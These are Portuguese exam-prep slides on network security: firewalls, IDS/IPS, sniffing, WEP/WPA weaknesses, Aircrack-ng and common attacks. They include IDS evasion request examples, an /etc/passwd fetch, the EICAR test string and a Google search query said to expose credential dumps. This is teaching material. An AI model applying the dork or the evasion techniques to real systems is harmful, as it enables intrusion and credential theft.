pf perito criminal

Curso MultiplusPreparatório para prova da

Polícia Federal

Segurança em redes de Computadores

Prof. Marcelo Ribeiromribeirobr (at) globo (dot) com

www.mribeirobr.com

SumárioAbordaremos os seguintes tópicos do Edital

8 - Segurança de redes de computadores

8.1 Firewall, sistemas de deteção de intrusão(IDS), antivírus, NAT, VPN

8.2 Monitoramento e análise de tráfego; Uso de Sniffers; Traffic Shaping

8.3 Tráfego de serviços e programas usados na internet

8.4 Segurança de redes sem fio: EAP, WEP, WPA, WPA2

8.5 Ataques em redes de computadores

Metodologia

Apresentaremos conceitos e alguns exemplos práticos

Tambem serão apresentadas questões de provas anteriores e questões de provas de certificações de Ethical hacking

Segurança em redes - Conceitos

Princípios Básicos

Confidencialidade: Certeza que somente as pessoas autorizadas a acessar os dados podem acessá-los

Integridade: Certeza que os dados não foram alterados - por acidente ou intencionalmente

Disponibilidade: Certeza que os dados estão acessíveis quando e onde forem necessários

Irretratabilidade: Impossibilidade em negar ser origem de uma informação

Segurança - Conceitos Básicos! Elementos Utilizados para Garantir a Confidencialidade

!   Criptografia dos dados !   Controle de acesso

!   Elementos para garantir a Integridade

!   Assinatura digital !   MD5- hash

!   Elementos para garantir a Disponibilidade

!   Backup !   Tolerância a falhas !   Redundância

!   Elementos para garantir a Irretratabilidade !   Assinatura digital

Segurança em redesPerímetro

!   Fronteira fortificada da sua rede de dados !   Deve incluir alguns elementos de proteção

Elementos de um Perímetro!   Firewall !   VPN ! Zona Desmilitarizada (DMZ) !   Host Hardening !   Intrusion Detection System (IDS) !   Intrusion Prevention System (IPS) !   Network Address Translation (NAT) ! Analisadores de Conteúdo ! Analisadores de Logs !   Security Information and Event Management (SIEM)

Elementos de um perímetro

Dispositivo (hardware + software) que possui regras específicas que permitem ou bloqueiam o tráfico

Barreiras de segurança entre a intranet e a Internet para proteger a rede interna contra acessos não autorizados

Mensagens que entram ou saem da rede devem ser examinadas pelo firewall, que toma ações de acordo com critérios de segurança especificados


Tipos:

Estático: Filtro de pacotes

Stateful: memoriza as conexões para uma melhor análise

Proxy de Aplicação

Elementos de um perímetroFirewall tipo filtro de pacotes

Servidor Web

HTTP

Outros Protocolos

Cliente

Elementos de um perímetroFirewall tipo filtro de pacotes

LAN

LAN

LAN

Internet

Firewall

Endereço/Serviço Autorizado

Endereço/Serviço não Autorizado


Exemplo de regra de firewall filtro de pacotes

access-list 102 permit tcp 192.168.100.200 0.0.0.0 eq 25

Essa regra, de número 102, permite o IP 192.168.100.200 sair para qualquer endereço (0.0.0.0) na porta 25/TCP (SMTP).


Filtro de pacotes - Vantagens

Fácil de implementar

Praticamente qualquer ativo de rede permite a criação de um

Filtro de pacote - Desvantagens

Facilmente burlável através de técnicas de IP Spoofing

Atua apenas na camada 3 do modelo OSI

Elementos de um perímetroO ataque de IP Spoofing consiste em enganar o Firewall, mudando a origem do pacote, para uma origem conhecida pelo Firewall e autorizada por ele.

Normalmente usa-se os ednereços da rede interna (os quais, normalmente, são confiáveis para o Firewall)

O Anti-Spoofing é um conjunto de regras que impede que pacotes com endereço das redes internas venham de interfaces externas.

Elementos de um perímetroProxy de aplicação

O que é? ! Procurador ! Atua no nível da aplicação- orientado a aplicação ! Geralmente, o cliente precisa ser modificado- não é transparente ! Funciona como acelerador - cache

Proxy Cache

Web Server

Elementos de um perímetroProxy de Aplicação

Por que usar? !   Autenticação de usuário !   Inspeção de Conteúdo !   Cache !   Registro de Acessos !   Esconde detalhes da rede interna

Proxy Cache

Web Server


Proxy Web Server

1

3

6

2

5

4

Verifica …

User autorizado?

Protocolo permitido?

Destino autorizado?


Internet

LAN2 Matriz

LAN1

1

3 5

6

2 4

Elementos de um perímetroProxy reverso

3

Web Server

DNS Server

Proxy R

5

4

2

6

1

Verifica …

Request é permitido?

Protocolo permitido?

Destino permitido?

Elementos de um perímetroFirewall Statefull Inspection

Tambem conhecido como Filtro de pacotes dinâmico

Consegue atuar nas 7 camadas do modelo OSI pois consegue reconhecer cada protocolo (não apenas abre as portas, mas entende o protocolo em si), podendo interpretar um ataque sobre o protocolo.

Elementos de um perímetroFirewall Statefull inspection

Vantagens

O mais seguro atualmente por conseguir reconhecer ataques semânticos

Desvantagens

Mais complexo de implementar e administrar

Necessita estar sempre atualizado para manter seu nível de segurança.


VPN - Virtual Private Network

Esta técnica consiste em encapsular um pacote, não cifrado, em um outro que está cifrado por uma chave de sessão.

O outro parceiro da comunicação será capaz em remover o pacote original do encapsulamento e estabelecer a comunicação com o pacote restaurado.


Internet

Usuário remoto

ISDN Cable DSL Site central

Server

Site Remoto

Site Remoto

Elementos de um perímetroClassificação de VPN

Por tipo

Remote access

Site-to-Site

Por tecnologia

IPSEC

SSL


DMZ - Demilitarized Zone

Rede separada, na qual são hospedados servidores ou serviços a serem disponibilizados externamente.

Objetiva separar os serviços externos da rede interna da empresa ou mesmo separar serviços mais críticos/vulneráveis de redes mais sensíveis.


Internet

Servidor Web

Firewall

Cliente

Intranet


Router B

Parceiro1 Parceiro2 Parceiro3

Internet

INTRANET

LAN1

LAN2

LAN3

LAN4

LAN5

FILIAL

VPN

DMZ

WEB Server

DNS Server

Mail Server

Proxy R.

Hardened Server

Firewall Firewall/ Proxy

Elementos de um perímetroSistemas de deteção de intrusão (IDS - Intrusion Detection System)

Utilizado para detectar e alertar eventos maliciosos

Antecipar possíveis invasões aos sistemas

O sistema de defesa deverá dispor de vários agentes IDS pela rede

Normalmente verifica assinaturas pré-definidas e eventos maliciosos

Podem ser de rede (NIDS) ou de host (HIDS)

Elementos de um Perímetro

HIDS

Esse tipo de IDS reside em um único “host” e monitora atividades específicas do mesmo

Pode ser baseado em assinaturas

Verifica a integridade dos arquivos do SO

Monitora utilização de recursos do host

Elementos de um perímetroHIDS - O que ele monitora?

!  Exemplos de componentes monitorados

!   Memória !   Arquivos executáveis !   Espaço em disco

!   Kernel

Elementos de um perímetroNIDS

Monitora todo o tráfego da rede e compara este a um banco de dados com assinaturas de ataque

Quando uma assinatura é detectada um evento é disparado pelo IDS

Sistema utilizado para detectar e/ou reagir a uma assinatura de ataque na rede

Utilizado para analisar o tráfego de rede em tempo real

Equipamento dedicado com processamento compatível com o tamanho da infra-estrutura

Elementos de um perímetroNIDS

!   Sensor de Rede !   Posicionamento em função do conhecimento da topologia

!   Em ambientes com switch - Espelhamento de porta !   Configuração stealth recomendada - Interface de captura sem endereçamento e capturando tráfego de rede em modo promíscuo

Elementos de um perímetroSistema de prevenção de intrusão - IPS (Intrusion Prevention System)

Funciona de forma análoga ao IDS, mas além de alertar sobre os ataques ele é capaz em bloquear os mesmos, através de interações com outros dispositivos na rede (Firewalls, roteadores, switches, dentre outros)

Pode ser usado em modo “Learning”, no qual atuará como um IDS

Elementos de um perímetroPrincipais problemas dos IPS/IDS

Dependem fortemente das assinaturas de ataques estarem atualizadas (semelhante aos anti-vírus)

Se houver um ataque dentro de uma VPN ou contra um servidor WEB com SSL habilitado ele será incapaz em detectar o ataque, face a criptografia *

Complexos de implementar

* A menos que seja um IPS recente, no qual é possível instalar as chaves de sessão de criptografia no mesmo, possibilitando a leitura do trafego anteriormente cifrado e sua análise.

Elemento de um perímetroTerminologia comum com IDS/IPS

Falso Positivo - A detecão de uma atividade normal, mas interpretada como uma atividade maliciosa. Ocorre normalmente pela configuração não ajustada do dispositivo de detecção. Pode ser atribuida a uma configuração “segura” demais ou ao comportamento pouco convencional de alguns protocolos

Falso Negativo - A interpretação de um evento malicioso como sendo uma atividade normal, não gerando nenhum tipo de aviso ao administrador do sistema. Normalmente ocorre com um dispositivo configurado para ser permissivo (por falha de configuração ou para permitir determinada aplicação funcionar)

Elementos de um perímetroFuncionamento de um IDS

Tecnologia complementar ao firewall

Realiza inspeção profunda em pacotes de rede (DPI)

Tecnologia Reativa – detection (ataque pode ser simples pacote)

Elementos de um perímetroO que IDS procuram?

Tentativa de Intrusão

Denial of Service

Atividade Suspeita

Anomalia em Protocolos

Anomalia Estatistica

Elementos de um perímetroModelos

Baseado em assinaturas

Baseado em detecção de anomalias

Estratégias de monitoramento

Tipos

Network Based

Host Based

Elementos de um perímetroIDS baseado em assinaturas - funcionamento

Análise por Pacote - procura assinaturas de ataque individualmente, em cada pacote. Não detecta ACK scans lentos. Não consegue verificar a relação entre pacotes associados. Ex. Shadow, RealSecure.

Statefull - Adiciona a capacidade de procurar por assinaturas na sessão. Entende fragmentação de pacotes e Identifica ataques em múltiplos pacotes, pois verifica o estado das comunicações e a remontagem dos pacotes. Ex. Loki (icmp e UDP53) – “Covert comunication Channel”. Ex. Network Flight Recorder, DragonIDS. Snort e CSIDS (estáticos com caract. Statefull).

Protocol Decode-Based - verificação é feita no nível da aplicação. Ex. HTTP e SMTP. Utilizados para prevencão de ataques a aplicações específicas.

Heuristic Analysis-Based - processo de analisar o tráfego de forma estatística.

Caracteriza o tráfego.

Quantas portas estão sendo abertas por um único host, por minuto? Quantos sistemas estão conectados a um único host? Quantas conexões por segundo estão sendo utlizadas?

Método utilizado para detectar port scan.

Elementos de um perímetroIDS baseados em assinaturas: Vantagens e desvantagens

Vantagens

Baixa rate de alarmes falsos, comparado com outros tipos de IDS.

Regras padronizadas e de fácil entendimento. As regras do IDS snort são simples e de fácil entendimento. Podem ser editadas e até mesmo criadas a partir do conhecimento do modus operandi de um exploit.

Desvantagens

Uso intenso de recursos pois pode verificar os pacotes nas camadas mais altas. O custo da abertura integral dos pacotes da rede pode ser bastante intenso, em termos de processamento e uso de memória.

A base de dados de assinaturas de ataques necessita de manutenção e updates contínuos, tendo em vista que novos ataques surgem a cada dia. Caso as atualizações não sejam efetuadas o sensor não irá alertar para um novo ataque. Esses ataques não serão detectados até que suas assinaturas sejam atualizadas ou criadas manualmente no IDS.

Elementos de um perímetroIDS baseado em anomalia

Aprende a rede

Fronteira entre normal e anormal é tenue

Elementos de um perímetroIDS baseado em anomalia

Vantagens

Dinamicamente adaptável a novos ataques, pois aprende a conhecer o comportamento da rede e alerta para qualquer nova atividade.

Simples de se implementar. Não há muito o que configurar, bastando colocá-lo para aprender e depois torná-lo funcional.

Desvantagens

Alta rate de alarmes falsos. Nem tudo é aprendido pelo IDS. Novas situações ocorrem a cada momento.

Atividade dos usuários e comportamento do sistema pode não ser estático o suficiente para ser implementado de forma efetiva. Configurações em uma rede local mudam o tempo todo.

Elementos de um perímetroEstratégias de monitoramento

Host - Fonte de dados: interna ao sistema. Geralmente logs do sistema (Ex.Windows event logs e Linux Syslog.

Restrito a eventos do sistema operacional. Pode monitorar system calls, memória, processos etc. Ex. Cisco Security Agent.

Monitoramento de Rede - Fonte de dados: pacotes de rede. Dispositivos de rede em modo promíscuo. Esse tipo pode ser afetado pela arquitetura da rede. Ex. redes com switches necessitam de algumas adaptações. Além disso, não é restrito a tráfego destinado a um único host Ex. Cisco IDS, Snort, Shadow.

Monitoramento de Aplicacao - Fonte de dados: aplicação em uso: logs de eventos da aplicação. Possiveis aplicações: Web servers - IIS, Apache etc. Mail servers – Sendmail, Exchange etc. Ex. Cisco Security Agent e ISS RealSecure – analisa logs, verifica assinaturas e entende aplicações Web –IIS e Apache.

Monitoramento de alvo - focado em um sistema. Monitora o estado de um objeto e utiliza criptografia – funções de hash. Detecta alterações no sistema, mas não envia alertas em tempo real. Ex. Alterações nos arquivos cmd.exe, /sbin/ps, ls etc. Ex. Tripwire e Advance Intrusion Detection Engine (AIDE).

Elementos de um perímetroIDS/IPS - Técnicas de evasão

Method Matching

URL Encoding

Duble Slashes

Self-Reference Directories

Flooding de alertas

Fragmentação

Elementos de um perímetroMethod Matching

Substituição

GET /cgi-bin/example.cgi HTTP/1.0

por

HEAD /cgi-bin/example.cgi HTTP/1.0

URL Encoding

http permite URL utilizando notação %xx, onde xx é o valor hex do caracter

cgi-bin = %63%67%69%2d%62%69%6e

get /%63%67%69%2d%62%69%6e/exemple.cgi HTTP/1.0

Double Slashes

Substitui / por //

Self-Reference Directories

Adiciona /./ na URL para confundir o sensor

Elementos de um perímetroTécnicas de evasão (cont.)

Flooding de alertas

Atacante utiliza ferramentas para confundir o sensor inundando o mesmo com pacotes que simulam assinaturas de ataque.

Sensor perde pacotes (flooding) ou o ADM fica confuso com tantos alertas (o ataque não é visualizado).

Ferramentas:

Stick e Snot - “IDS Killers”, baseados nas assinaturas do snort.

Nmap –D “decoy”.

Elementos de um perímetroTécnicas de evasão (cont.)

Fragmentação

Utilizada em todas as fases do ataque

Remontagem no destino confunde o sensor

Tipos de fragmentação

get …./etc/passwd

Elementos de um perímetroFragmentação (cont.)

Diferentes S.O remontam fragmentos de forma diferente. Não existe padronização para a remontagem.

O sensor, não necessariamente sabe o método de remontagem que será utilizado (fica confuso).

Snort com frag2 sempre remonta como Linux.

Snort com frag3 tem múltiplos buffers de remontagem.

CSIDS tem setagem para escolher manualmente – só pode remontar de uma forma e com isso só identifica ataques fragmentados em um único Sistema Operacional.

Ferramentas de attaque para fragmentação

Nmap – tiny fragment attack.

Fragrouter.

FragRoute.

Elementos de um perímetroNAT - Network Address Translation

Técnica utilizada por um dispositivo para a tradução de endereços IP

Permite que uma rede use um conjunto de endereços IP particulares para tráfego interno

Converte os endereços IP particulares em endereços IP públicos

Aumenta a segurança ocultando endereços IP Internos

Permite que uma organização economize endereços IP públicos

Pode ser classificado em:

Estático (ou 1 para 1) - Onde um endereço público é traduzido para um interno

Dinâmico (ou 1 para muitos) - Onde um endereço público pode ser traduzido para vários internos. O controle disso se dá através de uma tabela, no dispositivo que controla o NAT, associando cada conexão a um Source Port)


131.107.0.9 131.107.0.9

10.10.10.7 Tabela NAT !   10.10.10.0 mapeia

para 131.107.0.9

10.10.10.6

10.10.10.10

Elementos de um perímetroAnti-vírus

Software, comumente instalado nos hosts da rede, que tem como função buscar uma ameaça (malware) em um arquivo no computador.

Esta análise se dá através de comparação com um banco de assinaturas de malwares disponibilizada pelo fabricante

Pode usar uma análise herústica, que possibilita a detecção de malwares não conhecidos pelo fabricante, assim como também pode gerar grande número de falsos positivos.


Anti-vírus (cont.)

O que acontece se criarmos um arquivo texto em um computador com anti-vírus e digitamos as linhas abaixo?

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

Monitoramento e análise de tráfego

A tarefa de análise de tráfego de rede é executada, comumente, com o uso de uma ferramenta chamada Sniffer.

Esta ferramenta funciona lendo o tráfego de rede que chega até a interface de rede do computador utilizado para a análise

Em face do Sniffer apenas poder análisar o tráfego que passa pela sua interface de rede faz-se necessário que TODO o tráfego da rede chege a interface. Conseguimos isso colocando a interface de rede no chamado “modo promíscuo”


Modo promíscuo

Faz com que a placa da rede responda a todos os pacotes que circulam pela rede, independente se estes foram destinados aquela interface ou não

Consegue-se esse efeito respondendo a todos os pacotes de broadcast que circulam na rede, dando a impressão que todos os pacotes são para aquele host.


Sniffer

Contudo os pacotes ainda precisam ser acessíveis pela porta

Em uma rede com “Hubs” isso faz parte do modo de funcionamento normal da rede, pois TODAS AS PORTAS RECEBEM TODOS OS PACOTES (também chamado de “Passive Sniffing”)

Em uma rede com switches isso não acontece, pois O SWITCH REDIRECIONA O PACOTE PARA A PORTA CORRETA, EM CONFORMIDADE COM O SRC ADDRESS DO PACOTE

Como usar Sniffers em redes com switches?


Sniffer (cont.)

Switch Monitor port (Ou SPAN port)

Porta especial, configurável em um switch gerenciável, que recebe uma cópia de cada pacote que circula naquele switch, independente de ser a porta correta para aquele pacote

Serve apenas para monitoramento de rede.

Também chamado de “Active Sniffing”

Em equipamentos da Cisco a porta de monitoramento chama-se SPAN (Switched Port Analyser)

Vale salientar que esta dificuldade sobre a porta vale também para dispositivos como IDS e IPS pois, em essência, funcionam de forma análoga a um Sniffer.


Protocolos interessantes para se monitorar com um sniffer

Telnet e RLOGIN - Transmitem usuário e senha em claro na rede

HTTP - Todo o tráfego segue em claro

SMTP, NNTP, POP, FTP, IMAP - Senhas e dados seguem em claro


Ferramenta: Wireshark

Popular sniffer, open source, sendo praticamente ferramenta padrão deste tipo.


O que um sniffer não pode ver em uma rede?

Tráfego criptografado

Tráfego que não passe pela sua interface (a menos que seja feito um ataque para desviar a rota)


TCP Dump

Ferramenta para debugging de rede, na qual diversas outras são baseadas (o IDS Snort, por exemplo)

Usa a biblioteca Libpcap, também usada pelo Wireshark

Não é tão amigável quanto o Wireshark, mas é mais prático em algumas situações


TCP Dump


Exemplos práticos com o Wireshark


Traffic Shapping

Técnica que prioriza tráfego, de acordo com algumas políticas e regras, para otimizar o uso de largura de banda disponível no link

Muito utilizado como técnica de QoS (quality of service)

Pode priorizar usando as seguintes políticas

Por tipo de serviço

Por rede

Por peso de protocolo e conexão (WRR - Weighted round robin)

Muito utilizado em provedores de internet para controle de protocolos que reconhecidamente cogestionam uma rede (P2P por exemplo)

Segurança em redes sem fio

Redes sem fio (Wireless) estão cada vez mais presentes em nosso dia a dia, mas face a simplicidade em se colocar uma delas em funcionamento comumente estão inseguras.

É muito comum encontrar redes sem fio, sem senha, até mesmo no centro do RJ

Segurança em redes sem fioPadrões

Banda de até 54 Mbps e atua na faixa de frequencia de 5 Ghz!

Banda de até 11 Mbps e atua na faixa de frequencia de 2,4 Ghz!

Banda de até 54 Mbps e atua na faixa de frequencia de 2,4 Ghz!

Um padrão para WLAN que prove melhor criptografia para redes 802.11a,b e g!

Novo padrão 802.11 que suporta banda de 100Mbps +!

Grupo de padrões para Wireless MAN (Metropolitan Area Networks)!

Suporta transferencias a baixa velocidade (1-3 mbps) e baixo alcance (˜10 metros), desenvolvido para dispositivos móveis!

Segurança em redes sem fioService Set Identifier (SSID)

É um token para idenficar uma rede 802.11.

É parte do cabeçalho dos pacotes 802.11

Funciona como um identificador único compartilhado entre o AP e os clientes

Se alterado no AP precisa ser mudado em TODOS os clientes

Clientes podem se conectar a um SSID “none” ou “any”, que é uma configuração não segura.

Segurança em redes sem fioModo de autenticação Open Authentication Process

Segurança em redes sem fioModo de autenticação com Shared Key


Importante lembrar que uma rede sem fio funciona como um HUB.

Todos os AP de uma rede recebem todos os pacotes da rede

Mesmo os AP que não fazem parte da rede ainda podem receber os pacotes, pois os mesmo trafégam “over the air”, sem controle

Caso a rede possua uma senha estes pacotes estarão criptografados. Dependendo do algorítmo de criptografia as informações poderão ser acessadas em 10 minutos ou alguns anos...


EAP - Extensible Authentication Protocol

Padrão IEEE (RFC 5247)

Permite multiplos meios de autenticação, como certificados, tokens, kerberos ...

LEAP - Lightweight EAP - Versão proprietária da Cisco deste protocolo

Segurança em redes sem fioWEP (Wired Equivalency Protocol)

Padrão original de criptografia para redes sem fio

Facilmente quebrável (não segura)

Utiliza vetores de inicialização (IV) de 24-bits, que compõem uma cifra RC-4 para confidecialidade das comunicações.

Cada IV no WEP possui 24 bits, facilitando o processo de “quebra”

Segurança em redes sem fioWEP (cont.)

Usa CRC32 para integridade, que é insuficiente para garantir a integridade criptográfica do pacote.

Como cada IV tem 24 bits seria possível prever todos os IV em um AP, transmitindo pacotes de 1500 bytes a 11 Mb/s em 5 horas

Com um grande número de IV coletados é possível descobrir a chave secreta da rede

Por ser baseado em senhas pode ser alvo de ataques de dicionário

Mensagens de associação e disassociação de um host na rede não são autenticados, permitindo que derrubemos alguém da rede mesmo sem estar na rede

Segurança em redes sem fioWPA (Wi-fi protected Access)

Evolução do WEP, que resolve alguns dos problemas mais críticos deste.

IV’s de 48 bits ao invés de 24 bits

Uso mais raro de chaves compartilhadas e implementação de chaves temporárias para cifragem de pacotes (protoco TKIP - Temporal Key Integrity Protocol)

É possível injetar pacotes na rede para causar um Denial Of Service (DoS)

Suceptível a ataques de dicionário


Wi-fi Protected Access 2 (WPA2)

Atualmente o mais seguro dos mecanismos de criptografia e autenticação para redes sem fio

Basicamente é suceptível apenas a ataques de dicionário, que podem ser demorar muito tempo para completar

Segurança em redes sem fioAtaques ao controle de acesso

War Driving

Rogue Access Points

Mac Spoofing

Associações AD Hoc

AP mal configurados

Clients mal configurados

Associação não-autorizada

Promiscuous client


Ataques à integridade

Injeção de quadro de dados

WEP Injection

Data Replay

Initialization Vector Replay Attacks

Segurança em redes sem fioAtaques à confidencialidade

Honeypot Access Point

Traffic Analysis

Evil Twin AP

Man-in-the-middle (MITM)

Quebra de chave WEP

Segurança em redes sem fioAtaques à disponibilidade

Roubo de AP

DoS

Beacon Flood

Autenticate Flood

Disassociation Flood

De-Authenticate Flood

Segurança em redes sem fioRogue access point attack

Segurança em redes sem fioClient Mis-association

Segurança em redes sem fioUnauthorized Association

Segurança em redes sem fioHoneyspot Access Point Attack

Segurança em redes sem fioDenial of Service attack

Segurança em redes sem fioEntendendo um pacote 802.11

Segurança em redes sem fioPacote 802.11

Protocol Version - Indica a versão do do protocolo 802.11 usado. Valor atualmente é 0

Type e SubType - Determina a função do frame, podendo ser :

Control - Valor 1

Dados - Valor 2

Gerenciamento - Valor 0

To DS e From DS - Indica se o frame está vindo ou indo para o DS (Distribution System ou, na terminologia de rede sem fio, rede cabeada (Ethernet))

More fragments - Indica se há mais fragmentos nos frams que seguirão este

Retry - Indica se o frame está sendo retransmitido

Segurança em redes sem fioPacote 802.11 (cont.)

Power Management - Indica se o STA está em modo ativo (valor 0) ou em power-save (valor 1)

More Data - Indica para o STA, em power save mode, que o AP tem mais quadros para enviar.

WEP - Indica se há, ou não, criptografia no quadro analisado

Order - Indica ser o pacote está sendo enviado usando uma classe de serviço estritamente ordenada. Não utilizada atualmente.


Pacote 802.11 (cont.)

Sequence Control

Sequence number (12 bits) - Indica a o número de sequencia de cada quadro. Varia de 0-4095

Fragment Number (4 bits) - Indica o número de cada fragmento de um quadro enviado.

Segurança em redes sem fioPacote 802.11 (Cont.)

Data

Pode ter até 2324 bytes de dados.

O MSDU (Mac Service Data Unit) no padrão IEEE 802.11 é 2304 Bytes.

Há algum overhead quando usa-se criptografia:

WEP: 8 bytes -> 2312 Bytes total

TKIP (WPA1): 20 Bytes -> 2324 Bytes total

CCMP(WPA2): 16 Bytes -> 2320 Bytes total

Segurança em redes sem fioAtacando uma rede sem fio

Primeiramente é necessário ter uma placa de rede com um driver que permita a placa entrar no chamado “modo promíscuo”, semelhante ao que acontece com o uso de sniffers em redes cabeadas

Contudo nem todas as placas possuem um driver com esta função, pois não é comum o fabricante da placa de rede “bloquear” esta função em seus drivers originais

Contudo é possível encontrar uma uma relação de placas com drivers que suportam o modo promíscuo no link http://www.aircrack-ng.org/doku.php?id=compatibility_drivers#which_is_the_best_card_to_buy


Para fazer os ataques existe um framework conhecido chamado Aircrack-NG

Este software está instalado, por padrão, na distribuição Linux para testes de invasão “Backtrack” e “Kali Linux”

Existem versões para Windows, mas é mais comumente usada em Linux


Ferramentas do Aircrack-NG

Airmon-ng

Utilizado para habilitar o modo monitor(promíscuo) nas interfaces de rede sem fio

Sintaxe: airmon-ng <start|stop> interface [channel]

Segurança em redes sem fioFerramentas do Aircrack-NG (cont.)

Airdump-NG

Ferramenta utilizada para capturar dados brutos 802.11 e, particularmente, coletar IV’s WEP para uso posterior com o Aircrack-NG

Se houver um receptor de GPS plugado e compatível o Airdump-NG poderá mostrar as coordenadas geográficas dos AP ou clientes encontrados


Ferramentas Aircrack-NG (cont.)

Exemplo de saída do Airdump-NG CH 9 ][ Elapsed: 1 min ][ 2007-04-26 17:41 ][ WPA handshake: 00:14:6C:7E:40:80

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID00:09:5B:1C:AA:1D 11 16 10 0 0 11 54. OPN NETGEAR00:14:6C:7A:41:81 34 100 57 14 1 9 11 WEP WEP bigbear00:14:6C:7E:40:80 32 100 752 73 2 9 54 WPA TKIP PSK teddy

BSSID STATION PWR Lost Packets Probes00:14:6C:7A:41:81 00:0F:B5:32:31:31 51 2 14(not associated) 00:14:A4:3F:8D:13 19 0 4 mossy00:14:6C:7A:41:81 00:0C:41:52:D1:D1 -1 0 500:14:6C:7E:40:80 00:0F:B5:FD:FB:C2 35 0 99 teddy


Airdump-NG

Informações importantes

BSSID - Endereço MAC do AP

PWR - Nível de sinal reportado pela placa de rede. Quanto mais alto, mais próximo do AP ou da estação. Se o BSSID PWR é -1 então o driver não suporta report de nível de sinal. Se PWR é -1 para um número restrito de estações então este pacote veio do AP mas está indo para uma estação que está fora do alcance de nossa placa de rede. Se todos os clientes tiverem PWR -1 então o driver não suporta report de nível de sinal.


Airdump-NG


RXQ - Qualidade de recepção, que é medido pela porcentagem de pacotes (de gerenciamento e dados) que foram recebidos com sucesso nos últimos 10 segundos

BEACONS - Número de pacotes de anúncios enviados pelo AP. Cada AP envia em torno de 10 beacons por segundo.

#Data - Número de pacotes de dados capturados (se WEP, aponta o número de IV não repetidos), incluindo pacotes de broadcast

#/s - Número de pacotes de dados por segundo, medidos nos últimos 10 segundos.

CH - Número do canal (obtido dos pacotes de anúncio)


Airdump-NG


MB - Velocidade máxima suportada pelo AP. Se MB=11 então 802.11b, se MB = 22 então 802.11b +. E taxas mais altas de 802.11g

ENC - Algoritimo de criptografia em uso. OPN= Sem criptografia. WEP?= WEP ou superior (indefinido), WEP=WEP, WPA=WPA, WPA2=WPA2

CIPHER - Cifra detectada (CCMP, WRAP, TKIP, WEP, WEP40 ou WEP104)

AUTH - Tipo de autenticação (MGT=servidor de autenticação externo, SKA=Chave compartilhada para WEP, PSK=Chave compartilhada para WPA/WPA2 ou OPN=Aberta para WEP)


Airdump-NG


ESSID - Mostra o SSID. Se vazio o Airdump-NG tentará obter esta informação dos pacotes capturados

STATION - Endereço MAC das estações detectadas

LOST -Número dos pacotes perdidos nos últimos 10 segundos, baseado no número de sequencia.

PACKETS - Número de pacotes de dados enviados pelo cliente

PROBES - O SSID procurado pelo cliente



Aireplay-NG

Usado para gerar ou acelerar o tráfego para uso posterior com o Aircrack-NG

Suporta diversos tipos de ataques

Segurança em redes sem fioFerramentas do Aircrack-NG

Aireplay-NG - Ataques suportados

Ataque 0 - Deauthentication

Ataque 1 - Fake authentication

Ataque 2 - Interactive packet replay

Ataque 3 - ARP request replay attack

Ataque 4 - KoreK chopchop attack

Ataque 5 - Fragmentation attack

Ataque 9 - Injection test


Aireplay-NG - Ataques

De-athentication attack

Ataque número “0” do Aireplay

Força um cliente específico (ou todos, se não informarmos o MAC de um cliente) a se desconectar de uma rede sem fio e fazer nova autenticação.



Fake Authentication

Permite que vc faça dois tipos de autenticação WEP (Open system e chave compartilhada) e faça uma associação a um AP.

Este ataque é útil quando não há clientes associados a rede.



Interactive Packet Replay

Permite que um pacote seja re-inserido na rede (replayed), podendo gerar efeitos vantajosos ao atacante (como o aumento de vetores de inicialização)



ARP Request Replay

Semelhante ao Packet Replay, mas focado em ARP request.

Também possui foco em aumentar a geração de initialization vectors



Korek ChoChop Attack

Permite decifrar dados de uma rede WEP sem conhecer a chave

Não dá acesso a chave em si

Alguns AP não são vulneráveis ao ataque



Fragmentation Attack

Utilizado para obter o PRGA (Pseudo Random Generation Algorithm) dos pacotes

PRGA pode ser usado pelo packetforge-NG para gerar pacotes forjados dentro de uma rede sem fio



Aircrack-NG

Ferramenta para quebra de chaves WEP e WPA/PSK

Ataques em redes de computadores

Metodologia de ataque

Todo ataque é dividido em fases e estas não possuem um prazo exato para terminar. Podem durar alguns meses até anos, dependendo do alvo.

As fases são Reconhecimento, Obtendo acesso, mantendo acesso e limpando os traços.


Obtendo acesso

Nesta fase são exploradas as vulnerabilidades e fraquezas encontradas na fase anterior, visando obter acesso ao alvo

Uso de exploits contra servidores vulneráveis, uso de informações encontradas no google para invadir um servidor Web, engenharia social contra alvos pré-selecionados, dentre outras atividades.


Mantendo acesso

Após obter acesso desejamos manter este acesso, em caso do administrador descobrir a vulnerabilidade e remover esta.

Nesta fase são instalados backdoors, rootkits e qualquer código que permita um acesso posterior.


Limpando os traços

Nesta fase elimina-se, dentro do possível, os traços da presença do hacker no sistema invadido.

Logs comumente são apagados, códigos inseridos são ocultados, dentre outras tarefas.


Atividades

Google Hacking

Técnica que utiliza o Google para localizar servidores WEB vulneráveis ou até mesmo com backdoors ativos

Muito utilizado por hackers

Exemplo: Ao fazer uma pesquisa por allinurl:auth_user_file.txt no google encontramos uma lista de URLs com dump de MYSql server na internet, com livre acesso. Nesses dumps podemos encontrar credenciais de acesso que ainda podem ser válidas.

Para esta função o Google dispõe de diversos operadores que auxiliam na tarefa.


Tipos


Ataques

ARP Spoofing

Enganar o mapemento entre o endereço MAC e o enderereço IP feito pelo protocolo ARP (Address Resolution Protocol).

Endereço IP de 32 bits

Endereço Ethernet de 48 bits


Ataques

ARP Spoofing (cont.)

Deste ataque deriva uma técnica que permite fazer sniffing em uma rede com switches, mesmo sem o uso de portas de monitoramento=


Ataques

ARP Spoofing : Ferramenta

EtterCap

Mutito utilizada para fazer ataques ARP Spoofing e seus derivantes.


Ataques

DNS Spoofing

Ataque derivante do ARP Spoofing

Tem como objetivo desviar todas as solicitações de DNS que iriam para a internet para um DNS server controlado pelo hacker.

Com este controle é possível fazer o usuário abrir páginas com códigos maliciosos, fazendo que estas passem para o controle do atacante

A ferramenta Ettercap também é utilizada para este ataque


IP Spoofing

Falsificação de endereço IP de origem;

Não é possível obter respostas – vai para o endereço forjado;

Muito usado em ataques de negação de serviço (Denial-of-Service, DoS);

Egress Filtering para prevenção (anti-spoofing).


Fragmentação de pacotes IP

Característica do próprio protocolo;

MTU (Maximum Transfer Unit) – Ethernet é 1500, FDDI é 4470;

Fragmentação e reagrupamento (desfragmentação);

Uso de offsets para o reagrupamento.


Fragmentação de pacotes IP (cont.)

Ping of Death;

Teadrop;

Land;

Overlapping Fragment Attack.


Denial of Service

Afeta a disponibilidade da informação;

Explora recursos de uma forma agressiva, estressando-os e impedindo-os de realizar suas tarefas básicas;

